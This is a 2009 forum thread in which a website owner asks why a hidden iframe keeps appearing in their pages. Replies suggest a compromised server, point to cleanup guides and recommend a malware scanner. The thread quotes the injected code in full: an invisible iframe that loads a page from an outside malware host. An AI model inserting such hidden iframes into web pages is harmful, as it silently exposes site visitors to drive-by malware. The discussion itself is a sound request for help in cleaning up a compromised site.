View Full Version : is this a hacker of sorts? (security issues)

07-27-2009, 03:12 AM
lately this has been embedding itself into a number of pages (cutting off original coding and therefore disrupting the page):
<iframe src="http://xg8.in:8080/index.php" width=158 height=197 style="visibility: hidden"></iframe>

i'm going to change the cpanel and ftp passwords but i have no clue what the heck this is. all my googling returns results in foreign languages, but i do spy the word "malware." any help is appreciated!

07-27-2009, 03:58 AM
It could also be that your server is compromised or you have some server side code that has some vulnerabilities. Do you have any code that allows user uploads?

07-27-2009, 07:12 AM
nope, no such coding (i'm pretty sure). you can check out the site here:
if the server's been compromised, do you think resetting passwords and such will solve it or is there any other action i can do to fix it?
edit actually, now that i think about it, could someone be going through the contact form? it seems a little far fetched because the inserted code has been on various pages, mostly unrelated to the contact page, so i'm not sure how a person could manage to post the code in such varied locations.

07-27-2009, 09:39 AM
From what I've been reading it seems that your system might be compromised.


I know its not a .cn domain but the author says it applies to other domains too. Read the how to clean up part.

The free version of Malwarebytes Anti-Malware should find the problem if there is one:

07-28-2009, 09:20 PM
thanks for the help; hopefully this will solve it. :]